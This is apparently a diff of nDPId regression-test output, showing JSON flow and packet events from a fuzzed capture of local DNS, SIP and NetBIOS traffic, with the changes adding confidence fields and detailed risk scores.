-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471018720,"flow_last_seen":1120471018720,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471018720,"flow_last_seen":1120471018720,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":1120471018721,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120471018721,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CwgAR8InDQuAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAgQAAJxAACwlsb2NhbGhvc3QA"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471018721,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471018721,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00748{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":649,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":342,"pkt_l4_len":0,"ts_msec":1120471018870,"pkt":"AODtAW69ADBUADRWCABFAAFIAABACDcRiuXU8iEjwKgBAhPEE8QBNCHFU0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiAyOTg1ODE0qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":649,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":308}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1120471019307,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471019307,"pkt":"ADBUADRWAODtAW69CABFAABIbEwAAIARSwXAqAECwKgBAQsJADUANMyuXQ0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":1120471020302,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471020302,"pkt":"ADBUADRWAODtAW69CABFAABIbE4AAIARSwPAqAECwKgBAQsJADUANMyuXQ0BAAABAAAAAAAAcF9zaXAEX3VkcANzaXAJY3liZXJjaXT5AmRrAAAhAAE="}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":654,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471019307,"flow_last_seen":1120471020302,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471020302,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00875{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":654,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471019307,"flow_last_seen":1120471020302,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471020302,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1120471022305,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471022305,"pkt":"ADBUADRWAODtAW69CABFAABIbFAAAIARSwHAqAECwKgBAQsJADUANMyuXQ0BAAABAAAAAAAABF+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":659,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471019307,"flow_last_seen":1120471024307,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471024307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":659,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471019307,"flow_last_seen":1120471024307,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471024307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470832512,"flow_last_seen":1120470840523,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1120471033895,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1120471033895,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAADlbFMAAIARSWPAqAECwKgB\/wCKAIoA0VrwEQ6FZMCoAQIAigC7AAAgRUVEQURBBENERURHREZDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJOAP+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471036315,"flow_last_seen":1120471036315,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471036315,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1120471036315,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120471036315,"pkt":"ADBUADRWAODtAW69CABFAABEbFQAAIARSwHAqAECwKgBAQsKADUAMJWmjw4AAAABAAAAAAAAATEBEgEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471036315,"flow_last_seen":1120471036315,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471036315,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.?.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471036315,"flow_last_seen":1120471036315,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471036315,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.?.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":1120471036317,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120471036317,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CwoAR3gijw6AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAgAwAAcAMAAwAAQAAJRAACwlsb2NhbGhvc3QA"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":663,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471036317,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":663,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471036317,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00566{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470442140,"flow_last_seen":1120470442140,"flow_idle_time":600000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":19,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00551{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470442140,"flow_last_seen":1120470442140,"flow_idle_time":600000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":19,"flow_datalink":1,"flow_max_packets":3}
 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470949427,"flow_last_seen":1120470958433,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
